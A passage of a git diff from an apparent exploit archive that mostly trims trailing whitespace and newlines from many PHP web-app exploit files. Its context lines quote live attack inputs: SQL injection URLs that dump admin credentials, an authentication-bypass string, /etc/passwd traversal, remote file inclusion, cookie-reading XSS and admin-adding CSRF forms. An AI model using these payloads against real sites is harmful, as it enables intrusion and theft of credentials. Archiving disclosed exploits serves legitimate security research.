deðil.." http://VICTIM/Path/pwn.php?ID=1 [Blind] http://VICTIM/Path/pwn.php?ID=1 and 1=0 http://VICTIM/Path/pwn.php?ID=1 and 1=1 - ================================ + ================================ \ No newline at end of file diff --git a/exploits/php/webapps/15251.txt b/exploits/php/webapps/15251.txt index f4ece1e06..97c823209 100644 --- a/exploits/php/webapps/15251.txt +++ b/exploits/php/webapps/15251.txt @@ -33,4 +33,4 @@ clans website... no problem.---------------------------------------------------- # sky4@live.com # 4hm4d H0w4ri # Palestine In our Hearts -############################################################## +############################################################## \ No newline at end of file diff --git a/exploits/php/webapps/15338.txt b/exploits/php/webapps/15338.txt index 7e74aca77..9c8bf922a 100644 --- a/exploits/php/webapps/15338.txt +++ b/exploits/php/webapps/15338.txt @@ -29,4 +29,4 @@ Contact : eragon@legends.ag [ Special Thanks : KuBaNeZi , DJ-DUKLI , The|Denny` , Loock3D , BaDBoY ] -[ Visit / Greetz : ALBANIAN-LEGENDS.COM Members - www.eragon.ws - www.uah1.org.uk ] +[ Visit / Greetz : ALBANIAN-LEGENDS.COM Members - www.eragon.ws - www.uah1.org.uk ] \ No newline at end of file diff --git a/exploits/php/webapps/15389.php b/exploits/php/webapps/15389.php index b2697b474..47f68ef82 100644 --- a/exploits/php/webapps/15389.php +++ b/exploits/php/webapps/15389.php @@ -73,6 +73,4 @@ while(1) } else break; } -?> - - +?> \ No newline at end of file diff --git a/exploits/php/webapps/15430.txt b/exploits/php/webapps/15430.txt index 2a85e66ec..c709fb8c2 100644 --- a/exploits/php/webapps/15430.txt +++ b/exploits/php/webapps/15430.txt @@ -24,4 +24,4 @@ Joomla Component ccinvoices SQL Injection Vulnerability < -- bug code start -- > EXPLOIT : null+and+1=0+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -< -- bug code end of -- > +< -- bug code end of -- > \ No newline at end of file diff --git a/exploits/php/webapps/15452.txt b/exploits/php/webapps/15452.txt index 79d2159e5..d90e0a1b8 100644 --- a/exploits/php/webapps/15452.txt +++ b/exploits/php/webapps/15452.txt @@ -21,4 +21,4 @@ http://www.site.com/[path]/userlist.php?username[]=&show_group=-1&sort_by=userna http://www.site.com/[path]/moderate.php?get_host[]= -#SYSTEM_OVERIDE [07-11-2010] +#SYSTEM_OVERIDE [07-11-2010] \ No newline at end of file diff --git a/exploits/php/webapps/15453.txt b/exploits/php/webapps/15453.txt index 40ae5aba2..3d351ef06 100644 --- a/exploits/php/webapps/15453.txt +++ b/exploits/php/webapps/15453.txt @@ -15,6 +15,4 @@ http://site.com/index.php?option=com_ckforms&controller=../../../. ./../../../../../../etc/passwd%00 #################################################################### -RxH & ab0-3th4b - - +RxH & ab0-3th4b \ No newline at end of file diff --git a/exploits/php/webapps/15454.txt b/exploits/php/webapps/15454.txt index 65de6b7aa..5289db34f 100644 --- a/exploits/php/webapps/15454.txt +++ b/exploits/php/webapps/15454.txt @@ -16,6 +16,4 @@ www.site.com/index.php?action=com_clan&cid=185[Sql Injection] 185+and+1=2+union+select+1,2,3,4,5,6,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),8 -#################################################################### - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/15524.txt b/exploits/php/webapps/15524.txt index 4cb795b01..20a5e6245 100644 --- a/exploits/php/webapps/15524.txt +++ b/exploits/php/webapps/15524.txt @@ -13,6 +13,4 @@ In The Name Of GOD go to /signinform.php Username : admin - Password : 1'or'1'='1 - - + Password : 1'or'1'='1 \ No newline at end of file diff --git a/exploits/php/webapps/15568.py b/exploits/php/webapps/15568.py index 5f0ea7551..f7cb091a8 100755 --- a/exploits/php/webapps/15568.py +++ b/exploits/php/webapps/15568.py @@ -244,5 +244,4 @@ if sys.argv[3] == '-s': if len(sys.argv) < 4: printHelp() getSchemas(sessid, sys.argv[1], sys.argv[2], valId) - exit(0) - + exit(0) \ No newline at end of file diff --git a/exploits/php/webapps/15574.txt b/exploits/php/webapps/15574.txt index 2954cc9df..c646ef0a0 100644 --- a/exploits/php/webapps/15574.txt +++ b/exploits/php/webapps/15574.txt @@ -45,4 +45,4 @@ http://127.0.0.1/clip/index.php?v= {EV!L EXPLO!T} # [~]{[(D!R 4ll 0R D!E)]}; # # -[~]--------------------------------------------------------------------------------------------- +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/15585.txt b/exploits/php/webapps/15585.txt index dca89229a..b58f8d78d 100644 --- a/exploits/php/webapps/15585.txt +++ b/exploits/php/webapps/15585.txt @@ -19,7 +19,4 @@ http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../. _______________________________________________________________________ Thanks to : All RosebanditZ Team & All IndonesiaCoder -_______________________________________________________________________ - - - +_______________________________________________________________________ \ No newline at end of file diff --git a/exploits/php/webapps/15593.html b/exploits/php/webapps/15593.html index e9f61d5c7..5af905878 100644 --- a/exploits/php/webapps/15593.html +++ b/exploits/php/webapps/15593.html @@ -21,4 +21,4 @@ action="http://www.site.com:2082/frontend/x3/contact/saveemail.html"> -------------------------------------------------------------------------------------- -Gr33ts : RENO - Mr.M3x - all Member p0c Team .. +Gr33ts : RENO - Mr.M3x - all Member p0c Team .. \ No newline at end of file diff --git a/exploits/php/webapps/15621.txt b/exploits/php/webapps/15621.txt index 6974bfa5a..2db337daa 100644 --- a/exploits/php/webapps/15621.txt +++ b/exploits/php/webapps/15621.txt @@ -24,7 +24,4 @@ di anak tirikan karena ga tersebut nicknya) [#]------------------------------------------------------------------- note : jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap -apa yang kau katakan! - - - +apa yang kau katakan! \ No newline at end of file diff --git a/exploits/php/webapps/15638.txt b/exploits/php/webapps/15638.txt index 0f2714056..a74896693 100644 --- a/exploits/php/webapps/15638.txt +++ b/exploits/php/webapps/15638.txt @@ -36,5 +36,4 @@ Duhok Forum Remot upload Vulnerability greetz : kader11000 lagripe-dz mca_crb NetCat-Dz all dz members -www.h4kz.net www.v4-team.com www.vbspiders.com www.dz4all.com/cc - +www.h4kz.net www.v4-team.com www.vbspiders.com www.dz4all.com/cc \ No newline at end of file diff --git a/exploits/php/webapps/15720.txt b/exploits/php/webapps/15720.txt index 7394ca7a3..0ee174ab1 100644 --- a/exploits/php/webapps/15720.txt +++ b/exploits/php/webapps/15720.txt @@ -40,7 +40,4 @@ Spesial thanks : [ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org | makassarhacker.com ] note : jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap -apa yang kau katakan! - - - +apa yang kau katakan! \ No newline at end of file diff --git a/exploits/php/webapps/15813.txt b/exploits/php/webapps/15813.txt index 163e841bf..09445d9a5 100644 --- a/exploits/php/webapps/15813.txt +++ b/exploits/php/webapps/15813.txt @@ -63,6 +63,4 @@ exit(); Password: 'or'a'='a -#################################################################### - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/15814.txt b/exploits/php/webapps/15814.txt index b67dc7b3e..44b529b67 100644 --- a/exploits/php/webapps/15814.txt +++ b/exploits/php/webapps/15814.txt @@ -13,8 +13,4 @@ Joomla Component com_ponygallery Multiple Remote File Include www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?] www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?] -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/15815.txt b/exploits/php/webapps/15815.txt index 73c30307c..459e4035d 100644 --- a/exploits/php/webapps/15815.txt +++ b/exploits/php/webapps/15815.txt @@ -12,8 +12,4 @@ Joomla Component com_adsmanager Remote File Include www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?] -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/15822.html b/exploits/php/webapps/15822.html index a5e885dc6..71f8a119d 100644 --- a/exploits/php/webapps/15822.html +++ b/exploits/php/webapps/15822.html @@ -23,4 +23,4 @@ </form> <script>document.p0c.submit();</script> -NICKNAME: P0C T34M +NICKNAME: P0C T34M \ No newline at end of file diff --git a/exploits/php/webapps/15887.txt b/exploits/php/webapps/15887.txt index 8a46dcbc3..b2389450b 100644 --- a/exploits/php/webapps/15887.txt +++ b/exploits/php/webapps/15887.txt @@ -82,4 +82,4 @@ ############################################### - [ dun / 2011 ] + [ dun / 2011 ] \ No newline at end of file diff --git a/exploits/php/webapps/15889.txt b/exploits/php/webapps/15889.txt index a17e78b6d..c04364adf 100644 --- a/exploits/php/webapps/15889.txt +++ b/exploits/php/webapps/15889.txt @@ -60,4 +60,4 @@ ############################################### - [ dun / 2011-01-01 ] + [ dun / 2011-01-01 ] \ No newline at end of file diff --git a/exploits/php/webapps/15891.txt b/exploits/php/webapps/15891.txt index e6aba107c..2b9ad6bf0 100644 --- a/exploits/php/webapps/15891.txt +++ b/exploits/php/webapps/15891.txt @@ -18,8 +18,4 @@ www.site.com/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a www.site.com/gadmin/index.php -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/15892.html b/exploits/php/webapps/15892.html index df83372c0..99f35a038 100644 --- a/exploits/php/webapps/15892.html +++ b/exploits/php/webapps/15892.html @@ -23,8 +23,4 @@ YourTube v1.0 CSRF Vulnerability (Add User) </body> </html> -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/15999.txt b/exploits/php/webapps/15999.txt index 64f2c0d6d..148c6018a 100644 --- a/exploits/php/webapps/15999.txt +++ b/exploits/php/webapps/15999.txt @@ -17,4 +17,4 @@ == [#] Greetings: darkc0de's team , AsbMay's Group , w4ck1ng team , Q8 , and all muslims .. -== +== \ No newline at end of file diff --git a/exploits/php/webapps/16018.txt b/exploits/php/webapps/16018.txt index c50e8422d..5464eed52 100644 --- a/exploits/php/webapps/16018.txt +++ b/exploits/php/webapps/16018.txt @@ -16,4 +16,4 @@ == [#]Greetings: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" -== +== \ No newline at end of file diff --git a/exploits/php/webapps/16019.txt b/exploits/php/webapps/16019.txt index 61edeab07..32466e859 100644 --- a/exploits/php/webapps/16019.txt +++ b/exploits/php/webapps/16019.txt @@ -58,4 +58,4 @@ Already Tested on Win Xp # [~]{[(D!R 4ll 0R D!E)]}; # # -[~]--------------------------------------------------------------------------------------------- +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/16020.txt b/exploits/php/webapps/16020.txt index 9a82fbd2b..c2b3be8db 100644 --- a/exploits/php/webapps/16020.txt +++ b/exploits/php/webapps/16020.txt @@ -16,4 +16,4 @@ == [+]Greetings: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" -== +== \ No newline at end of file diff --git a/exploits/php/webapps/16034.txt b/exploits/php/webapps/16034.txt index 5b22f59d5..8637efa0b 100644 --- a/exploits/php/webapps/16034.txt +++ b/exploits/php/webapps/16034.txt @@ -17,4 +17,4 @@ == [|]Greetings: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" -== +== \ No newline at end of file diff --git a/exploits/php/webapps/16037.html b/exploits/php/webapps/16037.html index d3d0e323a..fdc68385e 100644 --- a/exploits/php/webapps/16037.html +++ b/exploits/php/webapps/16037.html @@ -31,8 +31,4 @@ PHP Link Directory v4.1.0 CSRF Vulnerability (Add Admin) </body> </html> -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/16047.txt b/exploits/php/webapps/16047.txt index d1df11b69..ca6d76cf4 100644 --- a/exploits/php/webapps/16047.txt +++ b/exploits/php/webapps/16047.txt @@ -21,8 +21,4 @@ www.site.com/games.php?id=null+and+1=2+union+select+1,group_concat(id,0x3a,user, www.site.com/admin/login.php -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/16062.txt b/exploits/php/webapps/16062.txt index 6b32a16d8..19c8aa634 100644 --- a/exploits/php/webapps/16062.txt +++ b/exploits/php/webapps/16062.txt @@ -18,5 +18,4 @@ after getting the username and the password you can login to admin panel [path]/admin == [-]Greetings: -darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" - +darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" \ No newline at end of file diff --git a/exploits/php/webapps/16069.txt b/exploits/php/webapps/16069.txt index afa0dc949..b0e9e0df1 100644 --- a/exploits/php/webapps/16069.txt +++ b/exploits/php/webapps/16069.txt @@ -15,4 +15,4 @@ Link: http://www.softbizsolutions.com/script-directory-software.php == Greetings: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" -== +== \ No newline at end of file diff --git a/exploits/php/webapps/16087.txt b/exploits/php/webapps/16087.txt index 25e036b90..2813d260e 100644 --- a/exploits/php/webapps/16087.txt +++ b/exploits/php/webapps/16087.txt @@ -62,5 +62,4 @@ http://www.target.com[path pmb]/index.php?lvl=coll_see&id=-1/**/union/**/select+ #Site : http://vbspiders.com #Critical Lvl : Dangerous #Mail: nourie.tlm[at]gmail.com ---------------------- Hack To Learn, Learn To Hack---------------------------- - +--------------------- Hack To Learn, Learn To Hack---------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/16122.txt b/exploits/php/webapps/16122.txt index 5caf542cb..b1860d4c9 100644 --- a/exploits/php/webapps/16122.txt +++ b/exploits/php/webapps/16122.txt @@ -23,6 +23,4 @@ Go to Control Admin [www.site.com/admin/] Dont Ask Username & Password ###################################################################### -txt - - +txt \ No newline at end of file diff --git a/exploits/php/webapps/16167.txt b/exploits/php/webapps/16167.txt index 10f2c765f..de09ff0e1 100644 --- a/exploits/php/webapps/16167.txt +++ b/exploits/php/webapps/16167.txt @@ -26,7 +26,4 @@ IV. Credits - God - bawahtanah_sii : tenro, sality23, em32, tdos, kiwill and my-Org - XCODE - semua [komunitas IT dan netter] underground INDONESIA -- All Friend's and Enemy who know me - - - +- All Friend's and Enemy who know me \ No newline at end of file diff --git a/exploits/php/webapps/16256.txt b/exploits/php/webapps/16256.txt index bd19444ee..2e23f44d1 100644 --- a/exploits/php/webapps/16256.txt +++ b/exploits/php/webapps/16256.txt @@ -14,5 +14,4 @@ www.site.com/archives.php?pid=null[Sql] www.site.com/page.php?pid=null+and+1=2+union+select+concat(username,0x3a,psword)+from+tbladmin_users www.site.com/archives.php?pid=null+and+1=2+union+select+1,2,3,concat(username,0x3a,psword),5,6,7,8,9,10,11+from+tbladmin_users -#################################################################### - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/16257.txt b/exploits/php/webapps/16257.txt index 3574603ba..b27e36abb 100644 --- a/exploits/php/webapps/16257.txt +++ b/exploits/php/webapps/16257.txt @@ -12,5 +12,4 @@ SnapProof (page.php) Sql Injection Vulnerability www.site.com/page.php?pID=null[Sql] www.site.com/page.php?pID=null+and+1=2+union+select+1,2,3,4 -#################################################################### - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/16934.pl b/exploits/php/webapps/16934.pl index 0ca3f0e38..f54517b62 100755 --- a/exploits/php/webapps/16934.pl +++ b/exploits/php/webapps/16934.pl @@ -77,5 +77,4 @@ for($i=1;$i<=$ARGV[3];$i++){ print v_request('Email: ','email','user','userid='.$2); } -} - +} \ No newline at end of file diff --git a/exploits/php/webapps/16937.pl b/exploits/php/webapps/16937.pl index c8459344a..b3d29d54c 100755 --- a/exploits/php/webapps/16937.pl +++ b/exploits/php/webapps/16937.pl @@ -34,6 +34,4 @@ my $response = $ua->get($ARGV[0].'/eggavatar.php?eggavatar.php?do=showeggs&u=1&o } else { die $response->status_line; - } - - + } \ No newline at end of file diff --git a/exploits/php/webapps/17007.txt b/exploits/php/webapps/17007.txt index cb250ffe6..18cd5440f 100644 --- a/exploits/php/webapps/17007.txt +++ b/exploits/php/webapps/17007.txt @@ -115,5 +115,4 @@ Vulnerable Javascript Source Code: [+] INDONESIANCODER still r0x... [+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat .. -[+] Malang Cyber Crew & Magelang Cyber Community - +[+] Malang Cyber Crew & Magelang Cyber Community \ No newline at end of file diff --git a/exploits/php/webapps/17018.txt b/exploits/php/webapps/17018.txt index c937ab070..d522739e4 100644 --- a/exploits/php/webapps/17018.txt +++ b/exploits/php/webapps/17018.txt @@ -28,5 +28,4 @@ POC http://site.com/blog/addComment.php?stat=stat&type=t&category_id=9&topic_id=-122/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16-- thanks, --p0pc0rn- - +-p0pc0rn- \ No newline at end of file diff --git a/exploits/php/webapps/17091.html b/exploits/php/webapps/17091.html index 9464cc566..ee37081df 100644 --- a/exploits/php/webapps/17091.html +++ b/exploits/php/webapps/17091.html @@ -20,8 +20,4 @@ E-Store 1.0 XSRF Vulnerability (Add Admin) </body> </html> -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/17092.html b/exploits/php/webapps/17092.html index 094e7d98b..9c29e7c7b 100644 --- a/exploits/php/webapps/17092.html +++ b/exploits/php/webapps/17092.html @@ -20,8 +20,4 @@ News 1.0 XSRF Vulnerability (Add Admin) </body> </html> -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/17093.html b/exploits/php/webapps/17093.html index 0ef8de82f..d0053aff6 100644 --- a/exploits/php/webapps/17093.html +++ b/exploits/php/webapps/17093.html @@ -20,8 +20,4 @@ Movies Library 2.0 XSRF Vulnerability (Add Admin) </body> </html> -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/17094.html b/exploits/php/webapps/17094.html index e3c88140e..44e70b562 100644 --- a/exploits/php/webapps/17094.html +++ b/exploits/php/webapps/17094.html @@ -20,8 +20,4 @@ Web Links 1.0 XSRF Vulnerability (Add Admin) </body> </html> -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/17095.html b/exploits/php/webapps/17095.html index 89715271c..1a7098877 100644 --- a/exploits/php/webapps/17095.html +++ b/exploits/php/webapps/17095.html @@ -20,8 +20,4 @@ Audio & Video Library 2.7.0 XSRF Vulnerability (Add Admin) </body> </html> -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/17096.html b/exploits/php/webapps/17096.html index cdad7d3f2..1c53f95f6 100644 --- a/exploits/php/webapps/17096.html +++ b/exploits/php/webapps/17096.html @@ -20,8 +20,4 @@ Super Multimedia Library 2.5.0 XSRF Vulnerability (Add Admin) </body> </html> -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/17146.txt b/exploits/php/webapps/17146.txt index e600ff358..401ed57c2 100644 --- a/exploits/php/webapps/17146.txt +++ b/exploits/php/webapps/17146.txt @@ -52,4 +52,4 @@ Already Tested on Win Xp # [~](>D!R 4ll 0R D!E<) #; # -[~]--------------------------------------------------------------------------------------------- +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/17173.txt b/exploits/php/webapps/17173.txt index a33385a4f..2c7fba2db 100644 --- a/exploits/php/webapps/17173.txt +++ b/exploits/php/webapps/17173.txt @@ -38,4 +38,4 @@ # 1337 Member: r0073r,Side^effects,r4dc0re,eidelweiss,SeeMe,agix,gunslinger # Sn!pEr.S!te,indoushka,Knockout,ZoRlu,AnT!-Tr0J4n,eXeSoul, =========================================================================== -# DisCovered By XroGuE !!! +# DisCovered By XroGuE !!! \ No newline at end of file diff --git a/exploits/php/webapps/17180.txt b/exploits/php/webapps/17180.txt index c03dc7f69..891019900 100644 --- a/exploits/php/webapps/17180.txt +++ b/exploits/php/webapps/17180.txt @@ -18,6 +18,4 @@ # Zend -=- Virangar-=-Milad-Bushehr -=- Iman_TakTaz -=- M3QD4D -=- Hijacker # # -=- elvator -=- r3d.z0nE -=- Behrooz_Ice -=- Ali_Eagle -=- Satanic2000 -=- Rz04 # # # -###################################### TNX All ###################################### - - +###################################### TNX All ###################################### \ No newline at end of file diff --git a/exploits/php/webapps/17292.txt b/exploits/php/webapps/17292.txt index f8503b9a5..17bcfc9d1 100644 --- a/exploits/php/webapps/17292.txt +++ b/exploits/php/webapps/17292.txt @@ -21,4 +21,4 @@ http://site.com/view/lang/index.php?page=../../../../../../../../../../../../../ http://site.com/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd -http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd +http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/exploits/php/webapps/17309.txt b/exploits/php/webapps/17309.txt index 8374690fb..733ac018d 100644 --- a/exploits/php/webapps/17309.txt +++ b/exploits/php/webapps/17309.txt @@ -29,7 +29,7 @@ the MP3 file format provided with the standard PHPCaptcha package available from www.phpcaptcha.org is available at: http://www.senseofsecurity.com.au/advisories/SOS-11-007.zip -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17309.zip (SOS-11-007.zip) +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17309.zip (SOS-11-007.zip) Proof of concept code is only available for the MP3 version of the audio, however the WAV audio format is also affected by the same diff --git a/exploits/php/webapps/17346.php b/exploits/php/webapps/17346.php index 1188864ad..608673b69 100644 --- a/exploits/php/webapps/17346.php +++ b/exploits/php/webapps/17346.php @@ -148,4 +148,4 @@ else echo "+---------------------------------------------------------------+\r\n"; echo "\n\n"; } -?> +?> \ No newline at end of file diff --git a/exploits/php/webapps/17737.txt b/exploits/php/webapps/17737.txt index b49b4987f..df14fc74d 100644 --- a/exploits/php/webapps/17737.txt +++ b/exploits/php/webapps/17737.txt @@ -16,4 +16,4 @@ Vulnerable code if($_REQUEST['action']=="activate"){ $key = md5(get_option("key").$_REQUEST['name'].$_REQUEST['id']); ... - $sql = "UPDATE fb_promotions SET `landing_order`=1,`activation_key`='".$key."' WHERE promo_id='".$_REQUEST['id']."'"; + $sql = "UPDATE fb_promotions SET `landing_order`=1,`activation_key`='".$key."' WHERE promo_id='".$_REQUEST['id']."'"; \ No newline at end of file diff --git a/exploits/php/webapps/17943.txt b/exploits/php/webapps/17943.txt index dde796216..5f39d315d 100644 --- a/exploits/php/webapps/17943.txt +++ b/exploits/php/webapps/17943.txt @@ -28,5 +28,4 @@ bd0rk's-Fixtip: Percolate the l-parameter before $_GET -Greetings from Germany, the 22 years old bd0rk. - +Greetings from Germany, the 22 years old bd0rk. \ No newline at end of file diff --git a/exploits/php/webapps/17980.txt b/exploits/php/webapps/17980.txt index 791147054..239fe4a7d 100644 --- a/exploits/php/webapps/17980.txt +++ b/exploits/php/webapps/17980.txt @@ -76,4 +76,4 @@ Patch FROM $settings_table_name ! WHERE form_id = ".$wpcf_easyform_formid." ORDER BY position - "); + "); \ No newline at end of file diff --git a/exploits/php/webapps/18036.txt b/exploits/php/webapps/18036.txt index acd059317..e4621e5a5 100644 --- a/exploits/php/webapps/18036.txt +++ b/exploits/php/webapps/18036.txt @@ -223,4 +223,4 @@ [09/10/2011] - Others vulnerabilities discovered [11/10/2011] - Issues reported to http://bugs.efrontlearning.net/browse/EF-675 [26/10/2011] - Vendor update released: http://forum.efrontlearning.net/viewtopic.php?t=3501 - [27/10/2011] - Public disclosure + [27/10/2011] - Public disclosure \ No newline at end of file diff --git a/exploits/php/webapps/18063.txt b/exploits/php/webapps/18063.txt index 07aac237c..78f606443 100644 --- a/exploits/php/webapps/18063.txt +++ b/exploits/php/webapps/18063.txt @@ -22,4 +22,4 @@ # # http://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL) # -################################################################################################ +################################################################################################ \ No newline at end of file diff --git a/exploits/php/webapps/18090.txt b/exploits/php/webapps/18090.txt index 851ab50ce..5566e58e7 100644 --- a/exploits/php/webapps/18090.txt +++ b/exploits/php/webapps/18090.txt @@ -24,9 +24,4 @@ http://localhost/labstore/stocks/interface_creator/index.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC http://localhost/labstore/stocks/interface_creator/index_long.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC - http://localhost/labstore/stocks/interface_creator/index_short.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC - - - - - + http://localhost/labstore/stocks/interface_creator/index_short.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC \ No newline at end of file diff --git a/exploits/php/webapps/18236.txt b/exploits/php/webapps/18236.txt index 572bbfc0a..68b41aca9 100644 --- a/exploits/php/webapps/18236.txt +++ b/exploits/php/webapps/18236.txt @@ -15,15 +15,4 @@ e-mail: <input type="Text" name="email" id="email" size="15"/> <br>web(optional): <input type="Text" name="web" id="web" size="15"/><br> comment: <input type="Text" name="comment" id="comment" size="15"/><br> <input type="Submit" name="comment_submit" id="comment_submit" value="invia" size="15"/> -<input type="Hidden" name="post" id="post" value="1"/></form> - - - - - - - - - - - +<input type="Hidden" name="post" id="post" value="1"/></form> \ No newline at end of file diff --git a/exploits/php/webapps/18330.txt b/exploits/php/webapps/18330.txt index d6686b3ee..539ab0e56 100644 --- a/exploits/php/webapps/18330.txt +++ b/exploits/php/webapps/18330.txt @@ -21,4 +21,4 @@ The final download link will be replaced with [REDIRECT-TO-URL] - POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"><script>alert(document.cookie)</script> + POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/exploits/php/webapps/18350.txt b/exploits/php/webapps/18350.txt index 28cb9296f..ca47899ec 100644 --- a/exploits/php/webapps/18350.txt +++ b/exploits/php/webapps/18350.txt @@ -15,5 +15,4 @@ age_month: 1 age_year: 1970 - Direct redirect to http://www.evil.com - + Direct redirect to http://www.evil.com \ No newline at end of file diff --git a/exploits/php/webapps/18527.txt b/exploits/php/webapps/18527.txt index 458b50126..60c3107d4 100644 --- a/exploits/php/webapps/18527.txt +++ b/exploits/php/webapps/18527.txt @@ -52,4 +52,4 @@ Contao 2.11 (and lower) is affected by CSRF Vulnerability which allows an attac </form> </body> </html> -+--------------------------------------------------------------------------------------------------------------------------------+ ++--------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/exploits/php/webapps/18536.txt b/exploits/php/webapps/18536.txt index ceeb47436..c7269b86b 100644 --- a/exploits/php/webapps/18536.txt +++ b/exploits/php/webapps/18536.txt @@ -58,4 +58,4 @@ administrator account and how to modify an existing and published web pages. oth </form> </body> </html> -+--------------------------------------------------------------------------------------------------------------------------------+ ++--------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/exploits/php/webapps/18575.txt b/exploits/php/webapps/18575.txt index d66dbf0dd..8655da8d1 100644 --- a/exploits/php/webapps/18575.txt +++ b/exploits/php/webapps/18575.txt @@ -33,4 +33,4 @@ and unpublished. In this POC I've deleted web page with ID=2 -+------------------------------------------------------------------------------------------------------------------------------------+ ++------------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/exploits/php/webapps/18598.txt b/exploits/php/webapps/18598.txt index 8e3b2f94d..7a76c9f87 100644 --- a/exploits/php/webapps/18598.txt +++ b/exploits/php/webapps/18598.txt @@ -19,8 +19,4 @@ InyeXion,LinuxFer, Scorp [PoC] -http://localhost/software/encapsgallery/templates/Shopcart/shopcart.php?action=add&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- - - - - +http://localhost/software/encapsgallery/templates/Shopcart/shopcart.php?action=add&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- \ No newline at end of file diff --git a/exploits/php/webapps/18652.txt b/exploits/php/webapps/18652.txt index d42db2eda..404664263 100644 --- a/exploits/php/webapps/18652.txt +++ b/exploits/php/webapps/18652.txt @@ -76,4 +76,4 @@ This cms is also affected by XSS vulnerabilities in "wolfcms/admin/user/add" pag "><script>alert("XSS")</script> -+--------------------------------------------------------------------------------------------------------------------------------+ ++--------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/exploits/php/webapps/18694.txt b/exploits/php/webapps/18694.txt index 7cf771113..ae5d014cd 100644 --- a/exploits/php/webapps/18694.txt +++ b/exploits/php/webapps/18694.txt @@ -82,4 +82,4 @@ Other parameters can be also modified. </form> </body> </html> -+--------------------------------------------------------------------------------------------------------------------------------+ ++--------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/exploits/php/webapps/18965.html b/exploits/php/webapps/18965.html index 7a610b642..d4b042349 100644 --- a/exploits/php/webapps/18965.html +++ b/exploits/php/webapps/18965.html @@ -47,5 +47,4 @@ CSRF (Add Reseller) </body> </html> -################################################################################## - +################################################################################## \ No newline at end of file diff --git a/exploits/php/webapps/19431.txt b/exploits/php/webapps/19431.txt index 6f3a86fbc..08f6a2c35 100644 --- a/exploits/php/webapps/19431.txt +++ b/exploits/php/webapps/19431.txt @@ -86,9 +86,4 @@ # # Vuln: http://localhost/webERP/includes/LanguageSetup.php?PathPrefix=http://localhost/phpinfo.txt? # - ### [ dun / 2012 ] ##################################################### - - - - - + ### [ dun / 2012 ] ##################################################### \ No newline at end of file diff --git a/exploits/php/webapps/2032.pl b/exploits/php/webapps/2032.pl index 04df4eb16..e2394968a 100755 --- a/exploits/php/webapps/2032.pl +++ b/exploits/php/webapps/2032.pl @@ -248,4 